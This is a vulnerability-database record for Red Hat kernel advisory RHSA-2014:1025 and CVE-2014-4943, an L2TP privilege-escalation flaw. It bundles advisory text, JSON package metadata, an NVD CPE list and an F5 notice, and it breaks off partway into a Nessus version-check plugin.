(RHSA-2014:1025) Important: kernel security and bug fix update
2014-08-06T04:00:00
ID RHSA-2014:1025 Type redhat Reporter RedHat Modified 2015-04-24T14:17:06
Description
The kernel packages contain the Linux kernel, the core of any Linux
operating system.
A flaw was found in the way the pppol2tp_setsockopt() and
pppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP
implementation handled requests with a non-SOL_PPPOL2TP socket option
level. A local, unprivileged user could use this flaw to escalate their
privileges on the system. (CVE-2014-4943, Important)
Red Hat would like to thank Sasha Levin for reporting this issue.
This update also fixes the following bug:
When a device was registered to a bus, a race condition could occur
between the device being added to the list of devices of the bus and
binding the device to a driver. As a result, the device could already be
bound to a driver which led to a warning and incorrect reference counting,
and consequently to a kernel panic on device removal. To avoid the race
condition, this update adds a check to identify an already bound device.
(BZ#1114409)
All kernel users are advised to upgrade to these updated packages, which
contain backported patches to correct these issues. The system must be
rebooted for this update to take effect.
{"published": "2014-08-06T04:00:00", "id": "RHSA-2014:1025", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "history": [], "description": "The kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A flaw was found in the way the pppol2tp_setsockopt() and\npppol2tp_getsockopt() functions in the Linux kernel's PPP over L2TP\nimplementation handled requests with a non-SOL_PPPOL2TP socket option\nlevel. A local, unprivileged user could use this flaw to escalate their\nprivileges on the system. (CVE-2014-4943, Important)\n\nRed Hat would like to thank Sasha Levin for reporting this issue.\n\nThis update also fixes the following bug:\n\n* When a device was registered to a bus, a race condition could occur\nbetween the device being added to the list of devices of the bus and\nbinding the device to a driver. As a result, the device could already be\nbound to a driver which led to a warning and incorrect reference counting,\nand consequently to a kernel panic on device removal. To avoid the race\ncondition, this update adds a check to identify an already bound device.\n(BZ#1114409)\n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect.\n", "_object_type": "robots.models.redhat.RedHatBulletin", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "vulnersScore": 7.2}, "type": "redhat", "enchantments_done": [], "lastseen": "2016-09-04T11:17:49", "title": "(RHSA-2014:1025) Important: kernel security and bug fix update", "href": "https://access.redhat.com/errata/RHSA-2014:1025", "modified": "2015-04-24T14:17:06", "bulletinFamily": "unix", "viewCount": 4, "cvelist": ["CVE-2014-4943"], "affectedPackage": [{"packageVersion": "2.6.32-220.54.1.el6", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-devel", "packageFilename": "kernel-devel-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel", "packageFilename": "kernel-2.6.32-220.54.1.el6.src.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "src"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "perf", "packageFilename": "perf-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-firmware", "packageFilename": "kernel-firmware-2.6.32-220.54.1.el6.noarch.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "noarch"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-headers", "packageFilename": "kernel-headers-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-debug", "packageFilename": "kernel-debug-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-doc", "packageFilename": "kernel-doc-2.6.32-220.54.1.el6.noarch.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "noarch"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "python-perf", "packageFilename": "python-perf-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "kernel", "packageFilename": "kernel-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}, {"packageVersion": "2.6.32-220.54.1.el6", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-2.6.32-220.54.1.el6.x86_64.rpm", "operator": "lt", "OSVersion": "6", "OS": "RedHat", "arch": "x86_64"}], "references": [], "reporter": "RedHat", "objectVersion": "1.4"}
{"result": {"cve": [{"lastseen": "2017-08-29T10:48:22", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1119458", "http://linux.oracle.com/errata/ELSA-2014-3048.html", "http://secunia.com/advisories/59790", "http://linux.oracle.com/errata/ELSA-2014-0924.html", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00025.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.html", "http://openwall.com/lists/oss-security/2014/07/17/1", "http://www.exploit-db.com/exploits/36267", "https://github.com/torvalds/linux/commit/3cf521f7dc87c031617fd47e4b7aa2593c2f3daf", "http://www.securitytracker.com/id/1030610", "https://exchange.xforce.ibmcloud.com/vulnerabilities/94665", "http://linux.oracle.com/errata/ELSA-2014-3047.html", "http://www.debian.org/security/2014/dsa-2992", "http://lists.opensuse.org/opensuse-security-announce/2015-03/msg00010.html", "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.html", "http://rhn.redhat.com/errata/RHSA-2014-1025.html", "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=3cf521f7dc87c031617fd47e4b7aa2593c2f3daf"], "edition": 3, "description": "The PPPoL2TP feature in net/l2tp/l2tp_ppp.c in the Linux kernel through 3.15.6 allows local users to gain privileges by leveraging data-structure differences between an l2tp socket and an inet socket.", "reporter": "NVD", "published": "2014-07-19T15:55:08", "title": "CVE-2014-4943", "type": "cve", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2014-4943"], "scanner": [], "cpe": ["cpe:/o:linux:linux_kernel:3.0.57", "cpe:/o:linux:linux_kernel:3.7", "cpe:/o:linux:linux_kernel:3.12.8", "cpe:/o:linux:linux_kernel:3.0.36", "cpe:/o:linux:linux_kernel:3.4.4", "cpe:/o:linux:linux_kernel:3.11.6", "cpe:/o:linux:linux_kernel:3.9:rc4", "cpe:/o:linux:linux_kernel:3.4.30", "cpe:/o:linux:linux_kernel:3.1.4", "cpe:/o:linux:linux_kernel:3.1.7", "cpe:/o:linux:linux_kernel:3.2:rc5", "cpe:/o:linux:linux_kernel:3.4.54", "cpe:/o:linux:linux_kernel:3.0.30", "cpe:/o:linux:linux_kernel:3.0.64", "cpe:/o:linux:linux_kernel:3.4.57", "cpe:/o:linux:linux_kernel:3.14.4", "cpe:/o:linux:linux_kernel:3.4.10", "cpe:/o:linux:linux_kernel:3.4:rc7", "cpe:/o:linux:linux_kernel:3.4.69", "cpe:/o:linux:linux_kernel:3.14:rc3", "cpe:/o:linux:linux_kernel:3.2.14", "cpe:/o:linux:linux_kernel:3.10.17", "cpe:/o:linux:linux_kernel:3.10", "cpe:/o:linux:linux_kernel:3.4.27", "cpe:/o:linux:linux_kernel:3.0.27", "cpe:/o:linux:linux_kernel:3.4.65", "cpe:/o:linux:linux_kernel:3.2.7", "cpe:/o:linux:linux_kernel:3.8.9", "cpe:/o:linux:linux_kernel:3.8.4", "cpe:/o:linux:linux_kernel:3.0.61", "cpe:/o:linux:linux_kernel:3.4.75", "cpe:/o:linux:linux_kernel:3.10.18", "cpe:/o:linux:linux_kernel:3.4.19", "cpe:/o:linux:linux_kernel:3.4.21", "cpe:/o:linux:linux_kernel:3.2.24", "cpe:/o:linux:linux_kernel:3.2.25", "cpe:/o:linux:linux_kernel:3.4.39", "cpe:/o:linux:linux_kernel:3.5.5", "cpe:/o:linux:linux_kernel:3.4.61", "cpe:/o:linux:linux_kernel:3.2:rc4", "cpe:/o:linux:linux_kernel:3.0.33", "cpe:/o:linux:linux_kernel:3.10.21", "cpe:/o:linux:linux_kernel:3.3.6", "cpe:/o:linux:linux_kernel:3.2.8", "cpe:/o:linux:linux_kernel:3.0.47", "cpe:/o:linux:linux_kernel:3.3:rc6", "cpe:/o:linux:linux_kernel:3.10.4", "cpe:/o:linux:linux_kernel:3.0.9", "cpe:/o:linux:linux_kernel:3.12.3", "cpe:/o:linux:linux_kernel:3.4.23", "cpe:/o:linux:linux_kernel:3.14:rc2", "cpe:/o:linux:linux_kernel:3.4.2", "cpe:/o:linux:linux_kernel:3.4.13", "cpe:/o:linux:linux_kernel:3.2.29", "cpe:/o:linux:linux_kernel:3.2.18", "cpe:/o:linux:linux_kernel:3.0.6", "cpe:/o:linux:linux_kernel:3.12.14", "cpe:/o:linux:linux_kernel:3.10.7", "cpe:/o:linux:linux_kernel:3.4.62", "cpe:/o:linux:linux_kernel:3.6.10", "cpe:/o:linux:linux_kernel:3.6.5", "cpe:/o:linux:linux_kernel:3.3:rc7", "cpe:/o:linux:linux_kernel:3.10.9", "cpe:/o:linux:linux_kernel:3.0.17", "cpe:/o:linux:linux_kernel:3.6", "cpe:/o:linux:linux_kernel:3.2.23", "cpe:/o:linux:linux_kernel:3.0.10", "cpe:/o:linux:linux_kernel:3.12.10", "cpe:/o:linux:linux_kernel:3.6.3", "cpe:/o:linux:linux_kernel:3.10.14", "cpe:/o:linux:linux_kernel:3.15.5", "cpe:/o:linux:linux_kernel:3.4.42", "cpe:/o:linux:linux_kernel:3.4.66", "cpe:/o:linux:linux_kernel:3.7.3", "cpe:/o:linux:linux_kernel:3.8.10", "cpe:/o:linux:linux_kernel:3.8.12", "cpe:/o:linux:linux_kernel:3.7.8", "cpe:/o:linux:linux_kernel:3.0.40", "cpe:/o:linux:linux_kernel:3.14:rc4", "cpe:/o:linux:linux_kernel:3.11.3", "cpe:/o:linux:linux_kernel:3.0.67", "cpe:/o:linux:linux_kernel:3.4.50", "cpe:/o:linux:linux_kernel:3.10.10", "cpe:/o:linux:linux_kernel:3.1.3", "cpe:/o:linux:linux_kernel:3.0.45", "cpe:/o:linux:linux_kernel:3.0.7", "cpe:/o:linux:linux_kernel:3.12.15", "cpe:/o:linux:linux_kernel:3.3", "cpe:/o:linux:linux_kernel:3.0.20", "cpe:/o:linux:linux_kernel:3.2.30", "cpe:/o:linux:linux_kernel:3.0.31", "cpe:/o:linux:linux_kernel:3.10.3", "cpe:/o:linux:linux_kernel:3.4.9", "cpe:/o:linux:linux_kernel:3.12.17", "cpe:/o:linux:linux_kernel:3.10.12", "cpe:/o:linux:linux_kernel:3.0.49", "cpe:/o:linux:linux_kernel:3.9:rc1", "cpe:/o:linux:linux_kernel:3.2.13", "cpe:/o:linux:linux_kernel:3.4.24", "cpe:/o:linux:linux_kernel:3.0.12", "cpe:/o:linux:linux_kernel:3.0.41", "cpe:/o:linux:linux_kernel:3.10.6", "cpe:/o:linux:linux_kernel:3.2:rc2", "cpe:/o:linux:linux_kernel:3.0.59", "cpe:/o:linux:linux_kernel:3.0.15", "cpe:/o:linux:linux_kernel:3.8.3", "cpe:/o:linux:linux_kernel:3.2.27", "cpe:/o:linux:linux_kernel:3.0.50", "cpe:/o:linux:linux_kernel:3.0.23", "cpe:/o:linux:linux_kernel:3.9:rc6", "cpe:/o:linux:linux_kernel:3.4.52", "cpe:/o:linux:linux_kernel:3.14:rc1", "cpe:/o:linux:linux_kernel:3.8.13", "cpe:/o:linux:linux_kernel:3.0.44", "cpe:/o:linux:linux_kernel:3.8.5", "cpe:/o:linux:linux_kernel:3.1.10", "cpe:/o:linux:linux_kernel:3.14:-", "cpe:/o:linux:linux_kernel:3.9.11", "cpe:/o:linux:linux_kernel:3.4.6", "cpe:/o:linux:linux_kernel:3.3:rc3", "cpe:/o:linux:linux_kernel:3.14:rc8", "cpe:/o:linux:linux_kernel:3.10.19", "cpe:/o:linux:linux_kernel:3.11", "cpe:/o:linux:linux_kernel:3.0.13", "cpe:/o:linux:linux_kernel:3.9.5", "cpe:/o:linux:linux_kernel:3.13.7", "cpe:/o:linux:linux_kernel:3.6.1", "cpe:/o:linux:linux_kernel:3.4.33", "cpe:/o:linux:linux_kernel:3.0.5", "cpe:/o:linux:linux_kernel:3.12.11", "cpe:/o:linux:linux_kernel:3.0.39", "cpe:/o:linux:linux_kernel:3.5.1", "cpe:/o:linux:linux_kernel:3.4.48", "cpe:/o:linux:linux_kernel:3.10.20", "cpe:/o:linux:linux_kernel:3.15.3", "cpe:/o:linux:linux_kernel:3.4.40", "cpe:/o:linux:linux_kernel:3.0.3", "cpe:/o:linux:linux_kernel:3.4.46", "cpe:/o:linux:linux_kernel:3.11.7", "cpe:/o:linux:linux_kernel:3.0.63", "cpe:/o:linux:linux_kernel:3.10.26", "cpe:/o:linux:linux_kernel:3.2.28", "cpe:/o:linux:linux_kernel:3.13.10", "cpe:/o:linux:linux_kernel:3.3.4", "cpe:/o:linux:linux_kernel:3.3.7", "cpe:/o:linux:linux_kernel:3.0.14", "cpe:/o:linux:linux_kernel:3.4:rc4", "cpe:/o:linux:linux_kernel:3.0.28", "cpe:/o:linux:linux_kernel:3.0.25", "cpe:/o:linux:linux_kernel:3.4.47", "cpe:/o:linux:linux_kernel:3.9.1", "cpe:/o:linux:linux_kernel:3.15.2", "cpe:/o:linux:linux_kernel:3.13.4", "cpe:/o:linux:linux_kernel:3.0.56", "cpe:/o:linux:linux_kernel:3.3:rc2", "cpe:/o:linux:linux_kernel:3.0.1", "cpe:/o:linux:linux_kernel:3.12.13", "cpe:/o:linux:linux_kernel:3.9:rc5", "cpe:/o:linux:linux_kernel:3.2.3", "cpe:/o:linux:linux_kernel:3.10.27", "cpe:/o:linux:linux_kernel:3.7.2", "cpe:/o:linux:linux_kernel:3.0.58", "cpe:/o:linux:linux_kernel:3.0.8", "cpe:/o:linux:linux_kernel:3.4.78", "cpe:/o:linux:linux_kernel:3.10.24", "cpe:/o:linux:linux_kernel:3.0.66", "cpe:/o:linux:linux_kernel:3.2.17", "cpe:/o:linux:linux_kernel:3.0.60", "cpe:/o:linux:linux_kernel:3.2.6", "cpe:/o:linux:linux_kernel:3.7.5", "cpe:/o:linux:linux_kernel:3.14.3", "cpe:/o:linux:linux_kernel:3.14:rc7", "cpe:/o:linux:linux_kernel:3.2.1", "cpe:/o:linux:linux_kernel:3.4.3", "cpe:/o:linux:linux_kernel:3.12.5", "cpe:/o:linux:linux_kernel:3.4.32", "cpe:/o:linux:linux_kernel:3.3.2", "cpe:/o:linux:linux_kernel:3.0:rc1", "cpe:/o:linux:linux_kernel:3.0.65", "cpe:/o:linux:linux_kernel:3.4.41", "cpe:/o:linux:linux_kernel:3.4.20", "cpe:/o:linux:linux_kernel:3.12.1", "cpe:/o:linux:linux_kernel:3.3.3", "cpe:/o:linux:linux_kernel:3.2.19", "cpe:/o:linux:linux_kernel:3.13.2", "cpe:/o:linux:linux_kernel:3.7.7", "cpe:/o:linux:linux_kernel:3.4.37", "cpe:/o:linux:linux_kernel:3.1:rc4", "cpe:/o:linux:linux_kernel:3.11.8", "cpe:/o:linux:linux_kernel:3.2.16", "cpe:/o:linux:linux_kernel:3.0.62", "cpe:/o:linux:linux_kernel:3.10.28", "cpe:/o:linux:linux_kernel:3.0.55", "cpe:/o:linux:linux_kernel:3.1.1", "cpe:/o:linux:linux_kernel:3.4.74", "cpe:/o:linux:linux_kernel:3.2.5", "cpe:/o:linux:linux_kernel:3.9.3", "cpe:/o:linux:linux_kernel:3.0.46", "cpe:/o:linux:linux_kernel:3.11.4", "cpe:/o:linux:linux_kernel:3.13.6", "cpe:/o:linux:linux_kernel:3.2:rc6", "cpe:/o:linux:linux_kernel:3.6.6", "cpe:/o:linux:linux_kernel:3.2.2", "cpe:/o:linux:linux_kernel:3.11.9", "cpe:/o:linux:linux_kernel:3.10.8", "cpe:/o:linux:linux_kernel:3.7.6", "cpe:/o:linux:linux_kernel:3.11.2", "cpe:/o:linux:linux_kernel:3.5.6", "cpe:/o:linux:linux_kernel:3.4.22", "cpe:/o:linux:linux_kernel:3.9.9", "cpe:/o:linux:linux_kernel:3.0.18", "cpe:/o:linux:linux_kernel:3.4.53", "cpe:/o:linux:linux_kernel:3.4.26", "cpe:/o:linux:linux_kernel:3.0.19", "cpe:/o:linux:linux_kernel:3.1.5", "cpe:/o:linux:linux_kernel:3.2:rc7", "cpe:/o:linux:linux_kernel:3.0.26", "cpe:/o:linux:linux_kernel:3.8.1", "cpe:/o:linux:linux_kernel:3.4.72", "cpe:/o:linux:linux_kernel:3.10.25", "cpe:/o:linux:linux_kernel:3.13.5", "cpe:/o:linux:linux_kernel:3.4", "cpe:/o:linux:linux_kernel:3.4.17", "cpe:/o:linux:linux_kernel:3.10.16", "cpe:/o:linux:linux_kernel:3.6.9", "cpe:/o:linux:linux_kernel:3.0.68", "cpe:/o:linux:linux_kernel:3.3:rc4", "cpe:/o:linux:linux_kernel:3.15.1", "cpe:/o:linux:linux_kernel:3.8.7", "cpe:/o:linux:linux_kernel:3.0.37", "cpe:/o:linux:linux_kernel:3.0.34", "cpe:/o:linux:linux_kernel:3.10.1", "cpe:/o:linux:linux_kernel:3.13.9", "cpe:/o:linux:linux_kernel:3.12.2", "cpe:/o:linux:linux_kernel:3.0.32", "cpe:/o:linux:linux_kernel:3.7.10", "cpe:/o:linux:linux_kernel:3.14.2", "cpe:/o:linux:linux_kernel:3.4.55", "cpe:/o:linux:linux_kernel:3.3.8", "cpe:/o:linux:linux_kernel:3.0.16", "cpe:/o:linux:linux_kernel:3.4.64", "cpe:/o:linux:linux_kernel:3.4:rc2", "cpe:/o:linux:linux_kernel:3.0.38", "cpe:/o:linux:linux_kernel:3.13.3", "cpe:/o:linux:linux_kernel:3.2.4", "cpe:/o:linux:linux_kernel:3.4.29", "cpe:/o:linux:linux_kernel:3.4.15", "cpe:/o:linux:linux_kernel:3.2.15", "cpe:/o:linux:linux_kernel:3.1.9", "cpe:/o:linux:linux_kernel:3.9:rc3", "cpe:/o:linux:linux_kernel:3.4.18", "cpe:/o:linux:linux_kernel:3.2.20", "cpe:/o:linux:linux_kernel:3.8.8", "cpe:/o:linux:linux_kernel:3.0:rc7", "cpe:/o:linux:linux_kernel:3.2:rc3", "cpe:/o:linux:linux_kernel:3.4.71", "cpe:/o:linux:linux_kernel:3.2.12", "cpe:/o:linux:linux_kernel:3.0:rc4", "cpe:/o:linux:linux_kernel:3.2.21", "cpe:/o:linux:linux_kernel:3.10.5", "cpe:/o:linux:linux_kernel:3.0.2", "cpe:/o:linux:linux_kernel:3.4.76", "cpe:/o:linux:linux_kernel:3.4.8", "cpe:/o:linux:linux_kernel:3.2.11", "cpe:/o:linux:linux_kernel:3.4.36", "cpe:/o:linux:linux_kernel:3.5.7", "cpe:/o:linux:linux_kernel:3.2.22", "cpe:/o:linux:linux_kernel:3.0:rc2", "cpe:/o:linux:linux_kernel:3.0.53", "cpe:/o:linux:linux_kernel:3.0.4", "cpe:/o:linux:linux_kernel:3.0.42", "cpe:/o:linux:linux_kernel:3.13", "cpe:/o:linux:linux_kernel:3.9.6", "cpe:/o:linux:linux_kernel:3.0.21", "cpe:/o:linux:linux_kernel:3.2.9", "cpe:/o:linux:linux_kernel:3.9.2", "cpe:/o:linux:linux_kernel:3.1:rc1", "cpe:/o:linux:linux_kernel:3.4.68", "cpe:/o:linux:linux_kernel:3.4.38", "cpe:/o:linux:linux_kernel:3.4.60", "cpe:/o:linux:linux_kernel:3.9.0", "cpe:/o:linux:linux_kernel:3.4.45", "cpe:/o:linux:linux_kernel:3.4.70", "cpe:/o:linux:linux_kernel:3.4.34", "cpe:/o:linux:linux_kernel:3.14:rc6", "cpe:/o:linux:linux_kernel:3.9.8", "cpe:/o:linux:linux_kernel:3.14:rc5", "cpe:/o:linux:linux_kernel:3.4.28", "cpe:/o:linux:linux_kernel:3.4.79", "cpe:/o:linux:linux_kernel:3.6.7", "cpe:/o:linux:linux_kernel:3.4.44", "cpe:/o:linux:linux_kernel:3.0.29", "cpe:/o:linux:linux_kernel:3.2", "cpe:/o:linux:linux_kernel:3.4.7", "cpe:/o:linux:linux_kernel:3.13.11", "cpe:/o:linux:linux_kernel:3.4.59", "cpe:/o:linux:linux_kernel:3.5.4", "cpe:/o:linux:linux_kernel:3.4.56", "cpe:/o:linux:linux_kernel:3.14.1", "cpe:/o:linux:linux_kernel:3.8.0", "cpe:/o:linux:linux_kernel:3.4.25", "cpe:/o:linux:linux_kernel:3.3.5", "cpe:/o:linux:linux_kernel:3.5.3", "cpe:/o:linux:linux_kernel:3.4.14", "cpe:/o:linux:linux_kernel:3.0.43", "cpe:/o:linux:linux_kernel:3.0.11", "cpe:/o:linux:linux_kernel:3.7.4", "cpe:/o:linux:linux_kernel:3.5.2", "cpe:/o:linux:linux_kernel:3.10.13", "cpe:/o:linux:linux_kernel:3.4:rc6", "cpe:/o:linux:linux_kernel:3.12.6", "cpe:/o:linux:linux_kernel:3.12.7", "cpe:/o:linux:linux_kernel:3.4.49", "cpe:/o:linux:linux_kernel:3.0.35", "cpe:/o:linux:linux_kernel:3.4.16", "cpe:/o:linux:linux_kernel:3.4:rc1", "cpe:/o:linux:linux_kernel:3.0.52", "cpe:/o:linux:linux_kernel:3.12", "cpe:/o:linux:linux_kernel:3.0.51", "cpe:/o:linux:linux_kernel:3.8.6", "cpe:/o:linux:linux_kernel:3.4:rc5", "cpe:/o:linux:linux_kernel:3.10.23", "cpe:/o:linux:linux_kernel:3.9:rc7", "cpe:/o:linux:linux_kernel:3.0.48", "cpe:/o:linux:linux_kernel:3.15", "cpe:/o:linux:linux_kernel:3.0.54", "cpe:/o:linux:linux_kernel:3.3:rc5", "cpe:/o:linux:linux_kernel:3.11.5", "cpe:/o:linux:linux_kernel:3.1:rc2", "cpe:/o:linux:linux_kernel:3.3:rc1", "cpe:/o:linux:linux_kernel:3.7.9", "cpe:/o:linux:linux_kernel:3.4.67", "cpe:/o:linux:linux_kernel:3.9.4", "cpe:/o:linux:linux_kernel:3.12.12", "cpe:/o:linux:linux_kernel:3.4.35", "cpe:/o:linux:linux_kernel:3.1", "cpe:/o:linux:linux_kernel:3.6.11", "cpe:/o:linux:linux_kernel:3.4.12", "cpe:/o:linux:linux_kernel:3.9.7", "cpe:/o:linux:linux_kernel:3.13.1", "cpe:/o:linux:linux_kernel:3.4:rc3", "cpe:/o:linux:linux_kernel:3.10.11", "cpe:/o:linux:linux_kernel:3.4.31", "cpe:/o:linux:linux_kernel:3.1.6", "cpe:/o:linux:linux_kernel:3.15.4", "cpe:/o:linux:linux_kernel:3.0.22", "cpe:/o:linux:linux_kernel:3.0.24", "cpe:/o:linux:linux_kernel:3.10.15", "cpe:/o:linux:linux_kernel:3.7.1", "cpe:/o:linux:linux_kernel:3.6.4", "cpe:/o:linux:linux_kernel:3.10.29", "cpe:/o:linux:linux_kernel:3.1.8", "cpe:/o:linux:linux_kernel:3.12.16", "cpe:/o:linux:linux_kernel:3.0:rc6", "cpe:/o:linux:linux_kernel:3.9.10", "cpe:/o:linux:linux_kernel:3.1.2", "cpe:/o:linux:linux_kernel:3.4.63", "cpe:/o:linux:linux_kernel:3.3.1", "cpe:/o:linux:linux_kernel:3.6.2", "cpe:/o:linux:linux_kernel:3.12.4", "cpe:/o:linux:linux_kernel:3.2.26", "cpe:/o:linux:linux_kernel:3.4.43", "cpe:/o:linux:linux_kernel:3.6.8", "cpe:/o:linux:linux_kernel:3.8.2", "cpe:/o:linux:linux_kernel:3.4.58", "cpe:/o:linux:linux_kernel:3.4.73", "cpe:/o:linux:linux_kernel:3.4.51", "cpe:/o:linux:linux_kernel:3.0:rc3", "cpe:/o:linux:linux_kernel:3.14.5", "cpe:/o:linux:linux_kernel:3.0:rc5", "cpe:/o:linux:linux_kernel:3.4.5", "cpe:/o:linux:linux_kernel:3.10.2", "cpe:/o:linux:linux_kernel:3.9:rc2", "cpe:/o:linux:linux_kernel:3.4.1", "cpe:/o:linux:linux_kernel:3.13.8", "cpe:/o:linux:linux_kernel:3.2.10", "cpe:/o:linux:linux_kernel:3.4.77", "cpe:/o:linux:linux_kernel:3.11.1", "cpe:/o:linux:linux_kernel:3.8.11", "cpe:/o:linux:linux_kernel:3.10.22", "cpe:/o:linux:linux_kernel:3.4.11", "cpe:/o:linux:linux_kernel:3.1:rc3", "cpe:/o:linux:linux_kernel:3.15.6", "cpe:/o:linux:linux_kernel:3.11.10", "cpe:/o:linux:linux_kernel:3.12.9"], "modified": "2017-08-28T21:35:10", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-4943", "id": "CVE-2014-4943", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "f5": [{"lastseen": "2016-09-26T17:22:56", "references": ["https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9970.html", "https://support.f5.com/kb/en-us/solutions/public/4000/900/sol4918.html", "https://support.f5.com/kb/en-us/solutions/public/4000/600/sol4602.html", "https://support.f5.com/kb/en-us/solutions/public/9000/900/sol9957.html"], "edition": 1, "description": "Recommended Action\n\nNone \n\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents.\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n", "reporter": "f5", "published": "2014-08-05T00:00:00", "title": "SOL15482 - Linux kernel vulnerability CVE-2014-4943", "type": "f5", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2014-4943"], "modified": "2014-08-05T00:00:00", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/400/sol15482.html", "id": "SOL15482", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2017-10-29T13:40:00", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=1119458", "http://www.nessus.org/u?b909c4ca"], "pluginID": "76613", "description": "Update to latest upstream stable release, Linux v3.15.6. Fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "reporter": "Tenable", "published": "2014-07-21T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "type": "nessus", "title": "Fedora 20 : kernel-3.15.6-200.fc20 (2014-8519)", "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-4943"], "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:20"], "modified": "2015-11-16T00:00:00", "id": "FEDORA_2014-8519.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=76613", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-8519.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(76613);\n script_version(\"$Revision: 1.5 $\");\n script_cvs_date(\"$Date: 2015/11/16 15:47:33 $\");\n\n script_cve_id(\"CVE-2014-4943\");\n script_xref(name:\"FEDORA\", value:\"2014-8519\");\n\n script_name(english:\"Fedora 20 : kernel-3.15.6-200.fc20 (2014-8519)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream stable release, Linux v3.15.6. Fixes across\nthe tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1119458\"\n );\n # 